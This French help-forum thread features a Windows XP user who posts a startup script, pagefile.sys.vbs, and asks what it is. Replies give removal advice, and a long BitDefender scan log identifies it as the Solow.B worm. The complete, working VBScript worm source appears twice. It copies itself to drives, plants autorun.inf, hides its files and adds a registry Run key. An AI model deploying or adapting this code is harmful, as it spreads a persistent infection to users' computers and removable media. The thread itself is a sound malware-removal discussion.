Pagefile.sys.vbs ????

Résolu
Bonjour,
Je suis sous Xp
J'ai un fichier nomé "pagefile.sys.vbs" que j'ai repéré parce qu'il se lance au démarage de Windows.
je n'arrive pas à suprimer.
Si quelqu'un pouvait me dire ce que c'est et comment le supprimé.
En voici le contenu.
============================================
nom du fichier "pagefile.sys.vbs"

'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
==========================================================

Merci pour vos informations
Denis
Configuration: Windows XP
Internet Explorer 7.0

27 réponses

Résumé de la discussion

Un fichier nommé pagefile.sys.vbs se lance au démarrage de Windows XP et résiste à la suppression, montrant qu'il modifie le registre et les fichiers autorun sur les lecteurs. Plusieurs réponses recommandent de démarrer en mode sans échec et de supprimer pagefile.sys.vbs et autorun.inf, puis d’effacer la clé Run MSRegInfo dans le registre et les traces sur les lecteurs. Des outils comme OTMoveIt et HijackThis, avec des antivirus, ont été utilisés pour nettoyer fichiers et entrées de registre, mais des retours indiquent une persistance sur le système et sur certains supports. Certaines mentions évoquent aussi la restauration système et la vérification des éléments déplacés ou supprimés lors d’un scan en ligne pour prévenir une réinfection.

Bobot (l’IA à votre service)
  1. le mieux c de passer par le dos, redemarrez la machine, apuyer sur f8 au moment du boot > choisir "invite de commandes en mode sans echec" puis supprimer manuelement avec la commande "DEL/A:R pagefile.sys.vbs" puis pareil avec autorun.inf et ce sur tout les lecteurs amovible et cle usb... eficace
    1
    1. bonjour. sa erres pas êtes plu rapide de formates lordi ? ^^
      0
  2. Contributeur sécurité
    AVG antispyware

    https://www.01net.com/telecharger/

    Tuto :
    http://www.kachouri.com/tuto/tuto-161-avg-anti-spyware-75-pour-votre-securite.html

    ->Relance AVG AS -> "Analyse" ->"Paramètres"

    Sous la question "Comment réagir ?" :

    -> clique sur "Actions recommandées" et choisis "Quarantaines"
    -> Re-clique sur l'onglet "Analyse" puis réalise une "Analyse complète du système"

    Si un fichier est infecté en fin d'analyse

    ->Clique sur "Appliquer toutes les actions "

    ->Clique sur "Enregistrer le rapport" puis sur "Enregistrer le rapport sous".

    ->Enregistre ce fichier texte sur ton bureau ensuite colle le rapport ici

    _______________
    colle le rapport d'un scan en ligne
    avec un des suivants:

    bitdefender en ligne :
    http://www.bitdefender.fr/scan_fr/scan8/ie.html

    scan en ligne firefox

    https://www.trendmicro.com/fr_fr/business.html

    Panda en ligne :
    http://pandasoftware.fr

    ____________________

    si ca persiste

    colle un rapport hijackthis

    http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

    manuel :

    https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html

    Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.

    ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste

    Ensuite avec Explorer créer un dossier c:\hijackthis
    Décompresser Hijackthis dans ce dossier.
    C'est important pour les sauvegardes."
    0
    1. Merci pour l'info
      Mais j'ai passé avast et ad aware et il n'ont rien détecté. Spybot non plus ?
      J'ai restauré mon systhème, à un date ou je savait que ce fichier n'était pas. Il n'st pas réaparue.
      Comme je souhaitais savoir ce que c'était et que je n'est pas trouvé d'infi sur google, je l'avais gargé en (.txt)
      Donc plus de détection possible pour le moment.
      Est ce un logciel espion un virus ?

      cordialement,
      Denis
      0
      1. Ok
        je vais faire ça.
        Personne ne peut déduire ce que c'est en regardant le contenu du fichier ?
        Je pensais cela possible.
        Denis
        0
        1. Contributeur sécurité
          slt
          si tu connais le lien du fichier le mieux est de le faire analyser par virus total ici

          https://www.virustotal.com/gui/

          il suffit d'envoyer ton fichier et il sera analysé par plusieurs antivirus

          a plus
          0
          1. je connais le contenu du fichier, je l'ai mis dans mon premier message.
            le revoici :
            nom du fichier "pagefile.sys.vbs" il se place dans C:\WINDOWS
            Contenu :

            'kuciapka tu byl
            on error resume next
            dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
            katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
            set kfs=createobject("Scripting.FileSystemObject")
            set kmf=kfs.getfile(Wscript.ScriptFullname)
            dim text,size
            size=kmf.size
            check=kmf.drive.drivetype
            set text=kmf.openastextstream(1,-2)
            do while not text.atendofstream
            ksource=ksource&text.readline
            ksource=ksource&vbcrlf
            loop
            do
            Set winpath=kfs.getspecialfolder(0)
            set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
            kuc.attributes=32
            set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
            kuc.write ksource
            kuc.close
            set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
            kuc.attributes=39
            for each kflash in kfs.drives
            If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
            set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
            kuc.attributes=32
            set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
            kuc.write ksource
            kuc.close
            set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
            kuc.attributes=39
            set kuc=kfs.getfile(kflash.path&"\autorun.inf")
            kuc.attributes=32
            set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
            kuc.write katrib
            kuc.close
            set kuc=kfs.getfile(kflash.path &"\autorun.inf")
            kuc.attributes=39
            end if
            next
            set rgpath=createobject("WScript.Shell")
            rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
            rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
            if check <> 1 then
            Wscript.sleep 200000
            end if
            loop while check<>1
            set sado=createobject("Wscript.shell")
            sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
            0
            1. Contributeur sécurité
              Salut

              Vas sur le site https://virusscan.jotti.org/
              - Clic en haut à droite sur "Parcourir", navigue dans les dossiers et sélectionne ce fichier :

              C:\WINDOWS\pagefile.sys.vbs

              - Clic sur submit toujours en haut à droite
              - Le scan va se lancer, ça va prendre un petit instant
              - En bas, tu as le résultat du scan, copie/colle le résultat complet du scan ici.
              Aide : https://www.malekal.com/scan-antivirus-ligne-nod32/#mozTocId662799
              0
              1. Bonsoir,
                Le fichier est revenu, je le retrouce à la racine de tout mes DD.
                J'ai fait également un scanne avec Bit défenderen voici le résultat
                BitDefender Online Scanner

                Rapport d'analyse généré à: Mon, Oct 08, 2007 - 21:41:39

                Voie d'analyse: A:\;C:\;D:\;E:\;F:\;G:\;H:\;

                Statistiques

                Temps
                01:58:41

                Fichiers
                386269

                Directoires
                14949

                Secteurs de boot
                6

                Archives
                4202

                Paquets programmes
                16344

                Résultats

                Virus identifiés
                7

                Fichiers infectés
                114

                Fichiers suspects
                0

                Avertissements
                0

                Désinfectés
                0

                Fichiers effacés
                223

                Info sur les moteurs

                Définition virus
                825589

                Version des moteurs
                AVCORE v1.0 (build 2422) (i386) (Sep 25 2007 08:26:36)

                Analyse des plugins
                14

                Archive des plugins
                38

                Unpack des plugins
                7

                E-mail plugins
                6

                Système plugins
                1

                Paramètres d'analyse

                Première action
                Désinfecté

                Seconde Action
                Supprimé

                Heuristique
                Oui

                Acceptez les avertissements
                Oui

                Extensions analysées
                *;

                Excludez les extensions

                Analyse d'emails
                Oui

                Analyse des Archives
                Oui

                Analyser paquets programmes
                Oui

                Analyse des fichiers
                Oui

                Analyse de boot
                Oui

                Fichier analysé
                Statut

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                Infecté par: Generic.Peed.Eml.09884D34

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                Echec de la désinfection

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                Supprimé

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox
                Mis à jour

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
                Infecté par: Generic.Peed.Eml.8ABE2DD0

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
                Echec de la désinfection

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
                Supprimé

                C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox
                Mis à jour

                C:\pagefile.sys.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\pagefile.sys.vbs=>(unicode)
                Echec de la désinfection

                C:\pagefile.sys.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
                Echec de la désinfection

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145651.vbs=>(unicode)
                Supprimé

                C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145652.vbs=>(unicode)
                Infecté par: Win32.Worm.Vbs.Solow.B

